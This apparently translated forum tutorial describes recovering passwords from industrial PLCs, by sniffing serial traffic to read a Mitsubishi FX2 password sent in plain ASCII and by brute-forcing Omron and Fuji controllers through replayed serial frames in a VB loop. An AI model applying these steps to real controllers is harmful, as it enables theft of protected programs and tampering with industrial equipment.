PLC encryption technology and decryption method
PLC encryption technology is actually an idea of developers. As long as you understand the author‘s encryption idea, you can decrypt it quickly. In fact, in nature, whether PLC or elevator motherboard, as long as there is encryption, there will be a secret to crack it. Ha ha, the two are always a combination of spear and shield. All right, stop talking nonsense and get to the point.

First, two PLC decryption methods are introduced: 1. Direct reading method. 2. Brute force cracking.

The direct reading method takes Mitsubishi FX2 as an example: first open the serial port monitoring software (there are many online Baidu. Here I use the serial port parallel port monitoring software in the forum PLC version) to monitor the import and export data of the serial port. Then let fxwin (PLC programming software) run online with PLC. After selecting the model, click the program to read. At this time, in the serial port monitoring software, you can see that several strings of characters have been sent between the computer and PLC. The last line sent by PLC to the computer is the password, but it is ASII code. Compare the table and translate it into characters to get the password. Oh, this is the vulnerability of Mitsubishi PLC. Its programming software reads the password into the computer memory first, compares it with the password entered by the user, and the password pair can read the program. I tried it. I sent the penultimate line of characters to PLC with serial port software, and PLC also returned the password. Speaking of this, do you know what the decryption software does? The whole decryption software only needs to send a string of characters to PLC, and then translate the characters with password returned by PLC into password. Some PLCs don‘t have such loopholes, such as Omron and Fuji Nb2. They transfer the password entered by the user to the PLC, and the PLC determines whether the password is correct before determining whether the program can be read.

To deal with them, use the second method, brute force cracking: similarly, run the serial port monitoring software, open the programming software online, click the program to read, and then enter the password 1234. If you read the program, you don‘t have to solve it. If the password error is displayed, look at the data in the monitoring software. Find the string 1234. After the character containing 1234, there will be a line of information returned by PLC indicating the password error, and record this line of error information. Then open VB and do a small project: let the computer send that line of string containing 1234 to the serial port. Of course, there should be a circular statement, that is, change 1234 from 0000 to ffff, and let the computer keep trying. Use the if statement to compare the returned information with the error information just recorded. If the information is different, stop trying. The password you try is the password of PLC.

Seeing this, do you already feel that PLC encryption technology is just so. The feeling of the sea and the sky. Congratulations, it means that you have understood the truth of encryption and decryption. There are many specific implementation methods. But understanding the truth is the most important and difficult. As the saying goes: the main road has no art, from medium to tangible, and the small road is clever. Hehe, let‘s talk about this first. Some details can‘t be introduced too clearly for a while and a half. You can do it yourself, try more, use your brain more, understand more, and you will gain. If you have any questions, you can leave me a message on the forum!

Remember, we master encryption and decryption technology only for better learning, and do not use it for other illegal purposes. Let me remind you here so as not to harm people‘s children.